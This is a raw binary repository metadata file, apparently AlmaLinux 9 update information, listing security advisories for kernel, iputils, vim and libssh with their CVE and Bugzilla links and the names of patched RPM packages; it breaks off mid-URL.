�,�}BBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityModerate: kernel security update&��c�ihttps://access.redhat.com/errata/RHSA-2025:16880RHSA-2025:16880RHSA-2025:16880https://access.redhat.com/security/cve/CVE-2025-38472CVE-2025-38472CVE-2025-38472https://access.redhat.com/security/cve/CVE-2025-38527CVE-2025-38527CVE-2025-38527https://access.redhat.com/security/cve/CVE-2025-38718CVE-2025-38718CVE-2025-38718https://access.redhat.com/security/cve/CVE-2025-39682CVE-2025-39682CVE-2025-39682https://access.redhat.com/security/cve/CVE-2025-39698CVE-2025-39698CVE-2025-39698https://bugzilla.redhat.com/23839162383916https://bugzilla.redhat.com/23889282388928https://bugzilla.redhat.com/23931662393166https://bugzilla.redhat.com/23935112393511https://bugzilla.redhat.com/23935192393519https://errata.almalinux.org/9/ALSA-2025-16880.htmlALSA-2025:16880ALSA-2025:16880ekernel-abi-stablelists-5.14.0-570.49.1.el9_6.noarch.rpm!ekernel-modules-core-5.14.0-570.49.1.el9_6.x86_64.rpm"ekernel-uki-virt-5.14.0-570.49.1.el9_6.x86_64.rpm%ekernel-uki-virt-addons-5.14.0-570.49.1.el9_6.x86_64.rpm ekernel-debug-uki-virt-5.14.0-570.49.1.el9_6.x86_64.rpmekernel-tools-5.14.0-570.49.1.el9_6.x86_64.rpmekernel-tools-libs-5.14.0-570.49.1.el9_6.x86_64.rpmekernel-modules-extra-5.14.0-570.49.1.el9_6.x86_64.rpmekernel-5.14.0-570.49.1.el9_6.x86_64.rpmekernel-modules-5.14.0-570.49.1.el9_6.x86_64.rpmekernel-debug-5.14.0-570.49.1.el9_6.x86_64.rpmekernel-core-5.14.0-570.49.1.el9_6.x86_64.rpmekernel-debug-modules-5.14.0-570.49.1.el9_6.x86_64.rpmekernel-debug-modules-core-5.14.0-570.49.1.el9_6.x86_64.rpmekernel-debug-core-5.14.0-570.49.1.el9_6.x86_64.rpmekernel-debug-modules-extra-5.14.0-570.49.1.el9_6.x86_64.rpmekernel-abi-stablelists-5.14.0-570.49.1.el9_6.noarch.rpm!ekernel-modules-core-5.14.0-570.49.1.el9_6.x86_64.rpm"ekernel-uki-virt-5.14.0-570.49.1.el9_6.x86_64.rpm%ekernel-uki-virt-addons-5.14.0-570.49.1.el9_6.x86_64.rpm ekernel-debug-uki-virt-5.14.0-570.49.1.el9_6.x86_64.rpmekernel-tools-5.14.0-570.49.1.el9_6.x86_64.rpmekernel-tools-libs-5.14.0-570.49.1.el9_6.x86_64.rpmekernel-modules-extra-5.14.0-570.49.1.el9_6.x86_64.rpmekernel-5.14.0-570.49.1.el9_6.x86_64.rpmekernel-modules-5.14.0-570.49.1.el9_6.x86_64.rpmekernel-debug-5.14.0-570.49.1.el9_6.x86_64.rpmekernel-core-5.14.0-570.49.1.el9_6.x86_64.rpmekernel-debug-modules-5.14.0-570.49.1.el9_6.x86_64.rpmekernel-debug-modules-core-5.14.0-570.49.1.el9_6.x86_64.rpmekernel-debug-core-5.14.0-570.49.1.el9_6.x86_64.rpmekernel-debug-modules-extra-5.14.0-570.49.1.el9_6.x86_64.rpm����M�,
�-�\BBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityModerate: kernel security update&��L�Fhttps://access.redhat.com/errata/RHSA-2025:17377RHSA-2025:17377RHSA-2025:17377https://access.redhat.com/security/cve/CVE-2024-50301CVE-2024-50301CVE-2024-50301https://access.redhat.com/security/cve/CVE-2025-38351CVE-2025-38351CVE-2025-38351https://access.redhat.com/security/cve/CVE-2025-39761CVE-2025-39761CVE-2025-39761https://bugzilla.redhat.com/23271882327188https://bugzilla.redhat.com/23820592382059https://bugzilla.redhat.com/23946062394606https://errata.almalinux.org/9/ALSA-2025-17377.htmlALSA-2025:17377ALSA-2025:17377fkernel-tools-libs-5.14.0-570.51.1.el9_6.x86_64.rpm%fkernel-uki-virt-addons-5.14.0-570.51.1.el9_6.x86_64.rpm fkernel-debug-uki-virt-5.14.0-570.51.1.el9_6.x86_64.rpmfkernel-tools-5.14.0-570.51.1.el9_6.x86_64.rpmfkernel-debug-core-5.14.0-570.51.1.el9_6.x86_64.rpmfkernel-debug-5.14.0-570.51.1.el9_6.x86_64.rpm"fkernel-uki-virt-5.14.0-570.51.1.el9_6.x86_64.rpmfkernel-modules-extra-5.14.0-570.51.1.el9_6.x86_64.rpmfkernel-debug-modules-extra-5.14.0-570.51.1.el9_6.x86_64.rpm!fkernel-modules-core-5.14.0-570.51.1.el9_6.x86_64.rpmfkernel-modules-5.14.0-570.51.1.el9_6.x86_64.rpmfkernel-debug-modules-core-5.14.0-570.51.1.el9_6.x86_64.rpmfkernel-debug-modules-5.14.0-570.51.1.el9_6.x86_64.rpmfkernel-core-5.14.0-570.51.1.el9_6.x86_64.rpmfkernel-5.14.0-570.51.1.el9_6.x86_64.rpmfkernel-abi-stablelists-5.14.0-570.51.1.el9_6.noarch.rpmfkernel-tools-libs-5.14.0-570.51.1.el9_6.x86_64.rpm%fkernel-uki-virt-addons-5.14.0-570.51.1.el9_6.x86_64.rpm fkernel-debug-uki-virt-5.14.0-570.51.1.el9_6.x86_64.rpmfkernel-tools-5.14.0-570.51.1.el9_6.x86_64.rpmfkernel-debug-core-5.14.0-570.51.1.el9_6.x86_64.rpmfkernel-debug-5.14.0-570.51.1.el9_6.x86_64.rpm"fkernel-uki-virt-5.14.0-570.51.1.el9_6.x86_64.rpmfkernel-modules-extra-5.14.0-570.51.1.el9_6.x86_64.rpmfkernel-debug-modules-extra-5.14.0-570.51.1.el9_6.x86_64.rpm!fkernel-modules-core-5.14.0-570.51.1.el9_6.x86_64.rpmfkernel-modules-5.14.0-570.51.1.el9_6.x86_64.rpmfkernel-debug-modules-core-5.14.0-570.51.1.el9_6.x86_64.rpmfkernel-debug-modules-5.14.0-570.51.1.el9_6.x86_64.rpmfkernel-core-5.14.0-570.51.1.el9_6.x86_64.rpmfkernel-5.14.0-570.51.1.el9_6.x86_64.rpmfkernel-abi-stablelists-5.14.0-570.51.1.el9_6.noarch.rpm�ǝ�U�-
�.�{securityModerate: iputils security update&���ghttps://access.redhat.com/errata/RHSA-2025:17558RHSA-2025:17558RHSA-2025:17558https://access.redhat.com/security/cve/CVE-2025-48964CVE-2025-48964CVE-2025-48964https://bugzilla.redhat.com/23826572382657https://errata.almalinux.org/9/ALSA-2025-17558.htmlALSA-2025:17558ALSA-2025:17558�f�%iputils-20210202-11.el9_6.3.x86_64.rpm�f�%iputils-20210202-11.el9_6.3.x86_64.rpm�Dz�^�.
�/�}BsecurityModerate: vim security update&��y�zhttps://access.redhat.com/errata/RHSA-2025:17742RHSA-2025:17742RHSA-2025:17742https://access.redhat.com/security/cve/CVE-2025-53905CVE-2025-53905CVE-2025-53905https://access.redhat.com/security/cve/CVE-2025-53906CVE-2025-53906CVE-2025-53906https://bugzilla.redhat.com/23803602380360https://bugzilla.redhat.com/23803622380362https://errata.almalinux.org/9/ALSA-2025-17742.htmlALSA-2025:17742ALSA-2025:17742�S�vim-minimal-8.2.2637-22.el9_6.1.x86_64.rpm�7�vim-filesystem-8.2.2637-22.el9_6.1.noarch.rpm�S�vim-minimal-8.2.2637-22.el9_6.1.x86_64.rpm�7�vim-filesystem-8.2.2637-22.el9_6.1.noarch.rpm�ǹ�	�/
�0�@BBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityModerate: kernel security update&��s�d
https://access.redhat.com/errata/RHSA-2025:17760RHSA-2025:17760RHSA-2025:17760https://access.redhat.com/security/cve/CVE-2023-53373CVE-2023-53373CVE-2023-53373https://access.redhat.com/security/cve/CVE-2025-38556CVE-2025-38556CVE-2025-38556https://access.redhat.com/security/cve/CVE-2025-38614CVE-2025-38614CVE-2025-38614https://access.redhat.com/security/cve/CVE-2025-39757CVE-2025-39757CVE-2025-39757https://bugzilla.redhat.com/23894562389456https://bugzilla.redhat.com/23894912389491https://bugzilla.redhat.com/23946152394615https://bugzilla.redhat.com/23963792396379https://errata.almalinux.org/9/ALSA-2025-17760.htmlALSA-2025:17760ALSA-2025:17760gkernel-5.14.0-570.52.1.el9_6.x86_64.rpmgkernel-tools-libs-5.14.0-570.52.1.el9_6.x86_64.rpmgkernel-tools-5.14.0-570.52.1.el9_6.x86_64.rpmgkernel-debug-5.14.0-570.52.1.el9_6.x86_64.rpm gkernel-debug-uki-virt-5.14.0-570.52.1.el9_6.x86_64.rpmgkernel-abi-stablelists-5.14.0-570.52.1.el9_6.noarch.rpmgkernel-debug-modules-extra-5.14.0-570.52.1.el9_6.x86_64.rpm%gkernel-uki-virt-addons-5.14.0-570.52.1.el9_6.x86_64.rpmgkernel-debug-modules-core-5.14.0-570.52.1.el9_6.x86_64.rpmgkernel-core-5.14.0-570.52.1.el9_6.x86_64.rpmgkernel-modules-extra-5.14.0-570.52.1.el9_6.x86_64.rpmgkernel-debug-core-5.14.0-570.52.1.el9_6.x86_64.rpm!gkernel-modules-core-5.14.0-570.52.1.el9_6.x86_64.rpmgkernel-debug-modules-5.14.0-570.52.1.el9_6.x86_64.rpmgkernel-modules-5.14.0-570.52.1.el9_6.x86_64.rpm"gkernel-uki-virt-5.14.0-570.52.1.el9_6.x86_64.rpmgkernel-5.14.0-570.52.1.el9_6.x86_64.rpmgkernel-tools-libs-5.14.0-570.52.1.el9_6.x86_64.rpmgkernel-tools-5.14.0-570.52.1.el9_6.x86_64.rpmgkernel-debug-5.14.0-570.52.1.el9_6.x86_64.rpm gkernel-debug-uki-virt-5.14.0-570.52.1.el9_6.x86_64.rpmgkernel-abi-stablelists-5.14.0-570.52.1.el9_6.noarch.rpmgkernel-debug-modules-extra-5.14.0-570.52.1.el9_6.x86_64.rpm%gkernel-uki-virt-addons-5.14.0-570.52.1.el9_6.x86_64.rpmgkernel-debug-modules-core-5.14.0-570.52.1.el9_6.x86_64.rpmgkernel-core-5.14.0-570.52.1.el9_6.x86_64.rpmgkernel-modules-extra-5.14.0-570.52.1.el9_6.x86_64.rpmgkernel-debug-core-5.14.0-570.52.1.el9_6.x86_64.rpm!gkernel-modules-core-5.14.0-570.52.1.el9_6.x86_64.rpmgkernel-debug-modules-5.14.0-570.52.1.el9_6.x86_64.rpmgkernel-modules-5.14.0-570.52.1.el9_6.x86_64.rpm"gkernel-uki-virt-5.14.0-570.52.1.el9_6.x86_64.rpm��¿7�0
�1�_BBsecurityModerate: libssh security update&��W�https://access.redhat.com/errata/RHSA-2025:18275RHSA-2025:18275RHSA-2025:18275https://access.redhat.com/security/cve/CVE-2025-5318CVE-2025-5318CVE-2025-5318https://bugzilla.redhat.com/23691312369131https://errata.almalinux.org/9/ALSA-2025-18275.htmlALSA-2025:18275ALSA-2025:18275�A�8libssh-0.10.4-15.el9_6.x86_64.rpm��8libssh-config-0.10.4-15.el9_6.noarch.rpm�A�8libssh-0.10.4-15.el9_6.i686.rpm�A�8libssh-0.10.4-15.el9_6.x86_64.rpm��8libssh-config-0.10.4-15.el9_6.noarch.rpm�A�8libssh-0.10.4-15.el9_6.i686.rpm����	�1
�2�cBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityModerate: kernel security update&��b�https://access.redhat.com/errata/RHSA-2025:18281RHSA-2025:18281RHSA-2025:18281https://access.redhat.com/security/cve/CVE-2022-50087CVE-2022-50087CVE-2022-50087https://access.redhat.com/security/cve/CVE-2025-22026CVE-2025-22026CVE-2025-22026https://access.redhat.com/security/cve/CVE-2025-38566CVE-2025-38566CVE-2025-38566https://access.redhat.com/security/cve/CVE-2025-38571CVE-2025-38571CVE-2025-38571https://access.redhat.com/security/cve/CVE-2025-39817CVE-2025-39817CVE-2025-39817https://access.redhat.com/security/cve/CVE-2025-39841CVE-2025-39841CVE-2025-39841https://access.redhat.com/security/cve/CVE-2025-39849CVE-2025-39849CVE-2025-39849https://bugzilla.redhat.com/23602242360224https://bugzilla.redhat.com/23735392373539https://bugzilla.redhat.com/23894802389480https://bugzilla.redhat.com/23894872389487https://bugzilla.redhat.com/23958052395805https://bugzilla.redhat.com/23969282396928https://bugzilla.redhat.com/23969442396944https://errata.almalinux.org/9/ALSA-2025-18281.htmlALSA-2025:18281ALSA-2025:18281hkernel-tools-libs-5.14.0-570.55.1.el9_6.x86_64.rpmhkernel-debug-modules-5.14.0-570.55.1.el9_6.x86_64.rpm!hkernel-modules-core-5.14.0-570.55.1.el9_6.x86_64.rpmhkernel-debug-modules-core-5.14.0-570.55.1.el9_6.x86_64.rpmhkernel-core-5.14.0-570.55.1.el9_6.x86_64.rpmhkernel-5.14.0-570.55.1.el9_6.x86_64.rpm%hkernel-uki-virt-addons-5.14.0-570.55.1.el9_6.x86_64.rpmhkernel-tools-5.14.0-570.55.1.el9_6.x86_64.rpmhkernel-debug-5.14.0-570.55.1.el9_6.x86_64.rpm hkernel-debug-uki-virt-5.14.0-570.55.1.el9_6.x86_64.rpmhkernel-modules-extra-5.14.0-570.55.1.el9_6.x86_64.rpmhkernel-debug-modules-extra-5.14.0-570.55.1.el9_6.x86_64.rpmhkernel-debug-core-5.14.0-570.55.1.el9_6.x86_64.rpm"hkernel-uki-virt-5.14.0-570.55.1.el9_6.x86_64.rpmhkernel-abi-stablelists-5.14.0-570.55.1.el9_6.noarch.rpmhkernel-modules-5.14.0-570.55.1.el9_6.x86_64.rpmhkernel-tools-libs-5.14.0-570.55.1.el9_6.x86_64.rpmhkernel-debug-modules-5.14.0-570.55.1.el9_6.x86_64.rpm!hkernel-modules-core-5.14.0-570.55.1.el9_6.x86_64.rpmhkernel-debug-modules-core-5.14.0-570.55.1.el9_6.x86_64.rpmhkernel-core-5.14.0-570.55.1.el9_6.x86_64.rpmhkernel-5.14.0-570.55.1.el9_6.x86_64.rpm%hkernel-uki-virt-addons-5.14.0-570.55.1.el9_6.x86_64.rpmhkernel-tools-5.14.0-570.55.1.el9_6.x86_64.rpmhkernel-debug-5.14.0-570.55.1.el9_6.x86_64.rpm hkernel-debug-uki-virt-5.14.0-570.55.1.el9_6.x86_64.rpmhkernel-modules-extra-5.14.0-570.55.1.el9_6.x86_64.rpmhkernel-debug-modules-extra-5.14.0-570.55.1.el9_6.x86_64.rpmhkernel-debug-core-5.14.0-570.55.1.el9_6.x86_64.rpm"hkernel-uki-virt-5.14.0-570.55.1.el9_6.x86_64.rpmhkernel-abi-stablelists-5.14.0-570.55.1.el9_6.noarch.rpmhkernel-modules-5.14.0-570.55.1.el9_6.x86_64.rpm����
�2
�3�BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityModerate: kernel security update&��w�https://access.redhat.com/errata/RHSA-2025:19409RHSA-2025:19409RHSA-2025:19409https://access.redhat.com/security/cve/CVE-2022-50367CVE-2022-50367CVE-2022-50367https://access.redhat.com/security/cve/CVE-2023-53494CVE-2023-53494CVE-2023-53494https://access.redhat.com/security/cve/CVE-2025-39702CVE-2025-39702CVE-2025-39702https://bugzilla.redhat.com/23935332393533https://bugzilla.redhat.com/23961142396114https://bugzilla.redhat.com/24007772400777https://errata.almalinux.org/9/ALSA-2025-19409.htmlALSA-2025:19409ALSA-2025:19409ikernel-modules-5.14.0-570.60.1.el9_6.x86_64.rpmikernel-debug-modules-5.14.0-570.60.1.el9_6.x86_64.rpm%ikernel-uki-virt-addons-5.14.0-570.60.1.el9_6.x86_64.rpm ikernel-debug-uki-virt-5.14.0-570.60.1.el9_6.x86_64.rpmikernel-debug-core-5.14.0-570.60.1.el9_6.x86_64.rpmikernel-tools-5.14.0-570.60.1.el9_6.x86_64.rpm!ikernel-modules-core-5.14.0-570.60.1.el9_6.x86_64.rpm"ikernel-uki-virt-5.14.0-570.60.1.el9_6.x86_64.rpmikernel-debug-modules-core-5.14.0-570.60.1.el9_6.x86_64.rpmikernel-modules-extra-5.14.0-570.60.1.el9_6.x86_64.rpmikernel-debug-5.14.0-570.60.1.el9_6.x86_64.rpmikernel-5.14.0-570.60.1.el9_6.x86_64.rpmikernel-tools-libs-5.14.0-570.60.1.el9_6.x86_64.rpmikernel-debug-modules-extra-5.14.0-570.60.1.el9_6.x86_64.rpmikernel-abi-stablelists-5.14.0-570.60.1.el9_6.noarch.rpmikernel-core-5.14.0-570.60.1.el9_6.x86_64.rpmikernel-modules-5.14.0-570.60.1.el9_6.x86_64.rpmikernel-debug-modules-5.14.0-570.60.1.el9_6.x86_64.rpm%ikernel-uki-virt-addons-5.14.0-570.60.1.el9_6.x86_64.rpm ikernel-debug-uki-virt-5.14.0-570.60.1.el9_6.x86_64.rpmikernel-debug-core-5.14.0-570.60.1.el9_6.x86_64.rpmikernel-tools-5.14.0-570.60.1.el9_6.x86_64.rpm!ikernel-modules-core-5.14.0-570.60.1.el9_6.x86_64.rpm"ikernel-uki-virt-5.14.0-570.60.1.el9_6.x86_64.rpmikernel-debug-modules-core-5.14.0-570.60.1.el9_6.x86_64.rpmikernel-modules-extra-5.14.0-570.60.1.el9_6.x86_64.rpmikernel-debug-5.14.0-570.60.1.el9_6.x86_64.rpmikernel-5.14.0-570.60.1.el9_6.x86_64.rpmikernel-tools-libs-5.14.0-570.60.1.el9_6.x86_64.rpmikernel-debug-modules-extra-5.14.0-570.60.1.el9_6.x86_64.rpmikernel-abi-stablelists-5.14.0-570.60.1.el9_6.noarch.rpmikernel-core-5.14.0-570.60.1.el9_6.x86_64.rpm�ȷ� �3
�4�aBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityModerate: kernel security update&��{�9https://access.redhat.com/errata/RHSA-2025:19930RHSA-2025:19930RHSA-2025:19930https://access.redhat.com/security/cve/CVE-2024-36350CVE-2024-36350CVE-2024-36350https://access.redhat.com/security/cve/CVE-2024-36357CVE-2024-36357CVE-2024-36357https://access.redhat.com/security/cve/CVE-2025-40300CVE-2025-40300CVE-2025-40300https://bugzilla.redhat.com/23507252350725https://bugzilla.redhat.com/23507262350726https://bugzilla.redhat.com/23946272394627https://errata.almalinux.org/9/ALSA-2025-19930.htmlALSA-2025:19930ALSA-2025:19930jkernel-modules-5.14.0-570.62.1.el9_6.x86_64.rpmjkernel-5.14.0-570.62.1.el9_6.x86_64.rpmjkernel-debug-core-5.14.0-570.62.1.el9_6.x86_64.rpmjkernel-debug-5.14.0-570.62.1.el9_6.x86_64.rpmjkernel-core-5.14.0-570.62.1.el9_6.x86_64.rpm jkernel-debug-uki-virt-5.14.0-570.62.1.el9_6.x86_64.rpmjkernel-abi-stablelists-5.14.0-570.62.1.el9_6.noarch.rpm"jkernel-uki-virt-5.14.0-570.62.1.el9_6.x86_64.rpmjkernel-debug-modules-core-5.14.0-570.62.1.el9_6.x86_64.rpmjkernel-tools-5.14.0-570.62.1.el9_6.x86_64.rpmjkernel-debug-modules-extra-5.14.0-570.62.1.el9_6.x86_64.rpmjkernel-tools-libs-5.14.0-570.62.1.el9_6.x86_64.rpm%jkernel-uki-virt-addons-5.14.0-570.62.1.el9_6.x86_64.rpmjkernel-debug-modules-5.14.0-570.62.1.el9_6.x86_64.rpm!jkernel-modules-core-5.14.0-570.62.1.el9_6.x86_64.rpmjkernel-modules-extra-5.14.0-570.62.1.el9_6.x86_64.rpmjkernel-modules-5.14.0-570.62.1.el9_6.x86_64.rpmjkernel-5.14.0-570.62.1.el9_6.x86_64.rpmjkernel-debug-core-5.14.0-570.62.1.el9_6.x86_64.rpmjkernel-debug-5.14.0-570.62.1.el9_6.x86_64.rpmjkernel-core-5.14.0-570.62.1.el9_6.x86_64.rpm jkernel-debug-uki-virt-5.14.0-570.62.1.el9_6.x86_64.rpmjkernel-abi-stablelists-5.14.0-570.62.1.el9_6.noarch.rpm"jkernel-uki-virt-5.14.0-570.62.1.el9_6.x86_64.rpmjkernel-debug-modules-core-5.14.0-570.62.1.el9_6.x86_64.rpmjkernel-tools-5.14.0-570.62.1.el9_6.x86_64.rpmjkernel-debug-modules-extra-5.14.0-570.62.1.el9_6.x86_64.rpmjkernel-tools-libs-5.14.0-570.62.1.el9_6.x86_64.rpm%jkernel-uki-virt-addons-5.14.0-570.62.1.el9_6.x86_64.rpmjkernel-debug-modules-5.14.0-570.62.1.el9_6.x86_64.rpm!jkernel-modules-core-5.14.0-570.62.1.el9_6.x86_64.rpmjkernel-modules-extra-5.14.0-570.62.1.el9_6.x86_64.rpm��ѴE�4
�5�@BBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityModerate: kernel security update&��4�X�ahttps://access.redhat.com/errata/RHSA-2025:20518RHSA-2025:20518RHSA-2025:20518https://bugzilla.redhat.com/22981692298169https://bugzilla.redhat.com/23120772312077https://bugzilla.redhat.com/23130922313092https://bugzilla.redhat.com/23201722320172https://bugzilla.redhat.com/23202592320259https://bugzilla.redhat.com/23204552320455https://bugzilla.redhat.com/23206162320616https://bugzilla.redhat.com/23207222320722https://bugzilla.redhat.com/23245492324549https://bugzilla.redhat.com/23272032327203https://bugzilla.redhat.com/23273742327374https://bugzilla.redhat.com/23278872327887https://bugzilla.redhat.com/23299182329918https://bugzilla.redhat.com/23303412330341https://bugzilla.redhat.com/23313262331326https://bugzilla.redhat.com/23343572334357https://bugzilla.redhat.com/23343962334396https://bugzilla.redhat.com/23344152334415https://bugzilla.redhat.com/23344392334439https://bugzilla.redhat.com/23345372334537https://bugzilla.redhat.com/23345472334547https://bugzilla.redhat.com/23345482334548https://bugzilla.redhat.com/23345602334560https://bugzilla.redhat.com/23346762334676https://bugzilla.redhat.com/23347952334795https://bugzilla.redhat.com/23348292334829https://bugzilla.redhat.com/23365412336541https://bugzilla.redhat.com/23371212337121https://bugzilla.redhat.com/23371242337124https://bugzilla.redhat.com/23388142338814https://bugzilla.redhat.com/23388282338828https://bugzilla.redhat.com/23388322338832https://bugzilla.redhat.com/23431722343172https://bugzilla.redhat.com/23431752343175https://bugzilla.redhat.com/23446842344684https://bugzilla.redhat.com/23446872344687https://bugzilla.redhat.com/23452402345240https://bugzilla.redhat.com/23462722346272https://bugzilla.redhat.com/23477072347707https://bugzilla.redhat.com/23477532347753https://bugzilla.redhat.com/23477592347759https://bugzilla.redhat.com/23477812347781https://bugzilla.redhat.com/23478072347807https://bugzilla.redhat.com/23478592347859https://bugzilla.redhat.com/23479192347919https://bugzilla.redhat.com/23479682347968https://bugzilla.redhat.com/23480222348022https://bugzilla.redhat.com/23480712348071https://bugzilla.redhat.com/23482382348238https://bugzilla.redhat.com/23482402348240https://bugzilla.redhat.com/23482792348279https://bugzilla.redhat.com/23485152348515https://bugzilla.redhat.com/23485232348523https://bugzilla.redhat.com/23485282348528https://bugzilla.redhat.com/23485412348541https://bugzilla.redhat.com/23485432348543https://bugzilla.redhat.com/23485472348547https://bugzilla.redhat.com/23485502348550https://bugzilla.redhat.com/23485542348554https://bugzilla.redhat.com/23485562348556https://bugzilla.redhat.com/23485662348566https://bugzilla.redhat.com/23485732348573https://bugzilla.redhat.com/23485742348574https://bugzilla.redhat.com/23485772348577https://bugzilla.redhat.com/23485782348578https://bugzilla.redhat.com/23485812348581https://bugzilla.redhat.com/23485842348584https://bugzilla.redhat.com/23485852348585https://bugzilla.redhat.com/23485872348587https://bugzilla.redhat.com/23485952348595https://bugzilla.redhat.com/23485972348597https://bugzilla.redhat.com/23486002348600https://bugzilla.redhat.com/23486012348601https://bugzilla.redhat.com/23486152348615https://bugzilla.redhat.com/23486202348620https://bugzilla.redhat.com/23486252348625https://bugzilla.redhat.com/23486342348634https://bugzilla.redhat.com/23486452348645https://bugzilla.redhat.com/23486502348650https://bugzilla.redhat.com/23486542348654https://bugzilla.redhat.com/23489012348901https://bugzilla.redhat.com/23503632350363https://bugzilla.redhat.com/23503672350367https://bugzilla.redhat.com/23503742350374https://bugzilla.redhat.com/23503752350375https://bugzilla.redhat.com/23503862350386https://bugzilla.redhat.com/23503882350388https://bugzilla.redhat.com/23503922350392https://bugzilla.redhat.com/23503962350396https://bugzilla.redhat.com/23503972350397https://bugzilla.redhat.com/23504002350400https://bugzilla.redhat.com/23505852350585https://bugzilla.redhat.com/23505892350589https://bugzilla.redhat.com/23507252350725https://bugzilla.redhat.com/23507262350726https://bugzilla.redhat.com/23516062351606https://bugzilla.redhat.com/23516082351608https://bugzilla.redhat.com/23516122351612https://bugzilla.redhat.com/23516132351613https://bugzilla.redhat.com/23516162351616https://bugzilla.redhat.com/23516182351618https://bugzilla.redhat.com/23516202351620https://bugzilla.redhat.com/23516242351624https://bugzilla.redhat.com/23516252351625https://bugzilla.redhat.com/23516292351629https://bugzilla.redhat.com/23516332351633https://bugzilla.redhat.com/23602152360215https://bugzilla.redhat.com/23633802363380https://bugzilla.redhat.com/23691842369184https://bugzilla.redhat.com/23760762376076https://bugzilla.redhat.com/23834412383441https://errata.almalinux.org/9/ALSA-2025-20518.htmlALSA-2025:20518ALSA-2025:20518https://www.redhat.com/security/data/cve/CVE-2022-48830.htmlCVE-2022-48830CVE-2022-48830https://www.redhat.com/security/data/cve/CVE-2022-49024.htmlCVE-2022-49024CVE-2022-49024https://www.redhat.com/security/data/cve/CVE-2022-49269.htmlCVE-2022-49269CVE-2022-49269https://www.redhat.com/security/data/cve/CVE-2022-49353.htmlCVE-2022-49353CVE-2022-49353https://www.redhat.com/security/data/cve/CVE-2022-49357.htmlCVE-2022-49357CVE-2022-49357https://www.redhat.com/security/data/cve/CVE-2022-49432.htmlCVE-2022-49432CVE-2022-49432https://www.redhat.com/security/data/cve/CVE-2022-49437.htmlCVE-2022-49437CVE-2022-49437https://www.redhat.com/security/data/cve/CVE-2022-49443.htmlCVE-2022-49443CVE-2022-49443https://www.redhat.com/security/data/cve/CVE-2022-49623.htmlCVE-2022-49623CVE-2022-49623https://www.redhat.com/security/data/cve/CVE-2022-49627.htmlCVE-2022-49627CVE-2022-49627https://www.redhat.com/security/data/cve/CVE-2022-49643.htmlCVE-2022-49643CVE-2022-49643https://www.redhat.com/security/data/cve/CVE-2022-49648.htmlCVE-2022-49648CVE-2022-49648https://www.redhat.com/security/data/cve/CVE-2022-49657.htmlCVE-2022-49657CVE-2022-49657https://www.redhat.com/security/data/cve/CVE-2022-49670.htmlCVE-2022-49670CVE-2022-49670https://www.redhat.com/security/data/cve/CVE-2022-49672.htmlCVE-2022-49672CVE-2022-49672https://www.redhat.com/security/data/cve/CVE-2022-49845.htmlCVE-2022-49845CVE-2022-49845https://www.redhat.com/security/data/cve/CVE-2024-36350.htmlCVE-2024-36350CVE-2024-36350https://www.redhat.com/security/data/cve/CVE-2024-36357.htmlCVE-2024-36357CVE-2024-36357https://www.redhat.com/security/data/cve/CVE-2024-46689.htmlCVE-2024-46689CVE-2024-46689https://www.redhat.com/security/data/cve/CVE-2024-46744.htmlCVE-2024-46744CVE-2024-46744https://www.redhat.com/security/data/cve/CVE-2024-47679.htmlCVE-2024-47679CVE-2024-47679https://www.redhat.com/security/data/cve/CVE-2024-47727.htmlCVE-2024-47727CVE-2024-47727https://www.redhat.com/security/data/cve/CVE-2024-49570.htmlCVE-2024-49570CVE-2024-49570https://www.redhat.com/security/data/cve/CVE-2024-49864.htmlCVE-2024-49864CVE-2024-49864https://www.redhat.com/security/data/cve/CVE-2024-50060.htmlCVE-2024-50060CVE-2024-50060https://www.redhat.com/security/data/cve/CVE-2024-50195.htmlCVE-2024-50195CVE-2024-50195https://www.redhat.com/security/data/cve/CVE-2024-50294.htmlCVE-2024-50294CVE-2024-50294https://www.redhat.com/security/data/cve/CVE-2024-52332.htmlCVE-2024-52332CVE-2024-52332https://www.redhat.com/security/data/cve/CVE-2024-53052.htmlCVE-2024-53052CVE-2024-53052https://www.redhat.com/security/data/cve/CVE-2024-53090.htmlCVE-2024-53090CVE-2024-53090https://www.redhat.com/security/data/cve/CVE-2024-53119.htmlCVE-2024-53119CVE-2024-53119https://www.redhat.com/security/data/cve/CVE-2024-53135.htmlCVE-2024-53135CVE-2024-53135https://www.redhat.com/security/data/cve/CVE-2024-53170.htmlCVE-2024-53170CVE-2024-53170https://www.redhat.com/security/data/cve/CVE-2024-53216.htmlCVE-2024-53216CVE-2024-53216https://www.redhat.com/security/data/cve/CVE-2024-53229.htmlCVE-2024-53229CVE-2024-53229https://www.redhat.com/security/data/cve/CVE-2024-53241.htmlCVE-2024-53241CVE-2024-53241https://www.redhat.com/security/data/cve/CVE-2024-53680.htmlCVE-2024-53680CVE-2024-53680https://www.redhat.com/security/data/cve/CVE-2024-54456.htmlCVE-2024-54456CVE-2024-54456https://www.redhat.com/security/data/cve/CVE-2024-56603.htmlCVE-2024-56603CVE-2024-56603https://www.redhat.com/security/data/cve/CVE-2024-56645.htmlCVE-2024-56645CVE-2024-56645https://www.redhat.com/security/data/cve/CVE-2024-56662.htmlCVE-2024-56662CVE-2024-56662https://www.redhat.com/security/data/cve/CVE-2024-56672.htmlCVE-2024-56672CVE-2024-56672https://www.redhat.com/security/data/cve/CVE-2024-56675.htmlCVE-2024-56675CVE-2024-56675https://www.redhat.com/security/data/cve/CVE-2024-56690.htmlCVE-2024-56690CVE-2024-56690https://www.redhat.com/security/data/cve/CVE-2024-56709.htmlCVE-2024-56709CVE-2024-56709https://www.redhat.com/security/data/cve/CVE-2024-56739.htmlCVE-2024-56739CVE-2024-56739https://www.redhat.com/security/data/cve/CVE-2024-56786.htmlCVE-2024-56786CVE-2024-56786https://www.redhat.com/security/data/cve/CVE-2024-57981.htmlCVE-2024-57981CVE-2024-57981https://www.redhat.com/security/data/cve/CVE-2024-57986.htmlCVE-2024-57986CVE-2024-57986https://www.redhat.com/security/data/cve/CVE-2024-57987.htmlCVE-2024-57987CVE-2024-57987https://www.redhat.com/security/data/cve/CVE-2024-57988.htmlCVE-2024-57988CVE-2024-57988https://www.redhat.com/security/data/cve/CVE-2024-57989.htmlCVE-2024-57989CVE-2024-57989https://www.redhat.com/security/data/cve/CVE-2024-57990.htmlCVE-2024-57990CVE-2024-57990https://www.redhat.com/security/data/cve/CVE-2